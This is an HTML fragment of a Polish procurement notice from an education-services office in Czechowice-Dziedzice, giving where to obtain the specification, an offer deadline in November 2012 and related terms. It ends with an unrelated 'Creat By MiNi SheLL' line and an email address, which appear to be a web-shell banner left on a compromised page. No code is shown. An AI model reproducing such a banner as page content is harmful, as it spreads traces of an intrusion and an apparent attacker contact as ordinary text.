<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zopo.czechowice-dziedzice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Obsługi Placówek Oświatowych w Czechowicach-Dziedzicach ul. Ligocka 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2012 godzina 08:00, miejsce: Zespół Obsługi Placówek Oświatowych w Czechowicach-Dziedzicach ul. Ligocka 1 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com